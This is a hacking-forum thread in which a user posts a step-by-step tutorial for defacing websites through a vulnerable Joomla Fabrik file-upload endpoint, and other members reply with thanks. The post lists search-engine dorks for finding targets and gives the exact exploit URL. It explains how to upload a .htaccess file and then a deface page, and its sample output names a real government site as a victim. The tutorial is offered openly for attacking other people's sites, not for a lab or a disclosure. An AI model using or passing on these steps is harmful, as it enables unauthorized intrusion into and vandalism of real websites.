Share [NEW] Deface Web On CSRF 2018 DORK
Indonesian Back|Track Team forum (https://www.indonesianbacktrack.or.id/forum), Attacker Zone, Web Attack
[NEW] Deface Web On CSRF 2018 DORK - bl4ck0wl - 03-12-2018

By:Blackowl
Thanks TO http://www.indonesianbacktrack.or.id
Deface Web On CSRF 2018
Method CSRF........

=============
DORK
=============
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com
(Just develop these further)

==============
TOOLS & MATERIALS
==============
Csrf Com_Fabrik (click me)
.htaccess file (touch me, babe)
Your own HTML deface script
Exploit /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

==================================
LIVE TARGET : http://xxxxx.xyz
==================================

Tutorial ./Nocturnal-start

1) Dork as usual and look for sites that seem vulnerable.

2) Once you have one, enter the exploit, for example "http://xxxxx.xyz/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
If it is vulnerable, text like this appears

3) Next, we edit the csrf script to upload the htaccess file.
Edit only this part
Replace http://site.com with the site you want to execute on :v
Once it is edited, don't forget to save :v

4) Next, edit the htaccess file.
Edit the part "DirectoryIndex frogs.html"; replace frogs.html with the name of your deface script.
When you have finished editing, open the csrf.

5) Upload the .htaccess file first; if it succeeds, there is text like this:
{"filepath":"\/.htaccess","uri":"http:\/\/pn-maros.go.id\/.htaccess"}
Once the htaccess file has been uploaded successfully, go straight to uploading your deface script.
When you have finished uploading the .htaccess and the script, just check the website; if it isn't defaced, look for another website, don't give up.

By:bl4ck0wl

RE: [NEW] Deface Web On CSRF 2018 DORK - cyberking - 03-14-2018

(03-12-2018, 12:52 PM)bl4ck0wl Wrote: By:Blackowl

keep it up, nice share, btw this one's naughty, pepes pepes :p

RE: [NEW] Deface Web On CSRF 2018 DORK - bl4ck0wl - 03-16-2018

hahaha

RE: [NEW] Deface Web On CSRF 2018 DORK - mend0an - 03-17-2018

Thank you, master

RE: [NEW] Deface Web On CSRF 2018 DORK - vizt3r - 05-16-2018

Aww, and my laptop is broken right now hahaha, I'll just padlock it for now. Thank you, friend.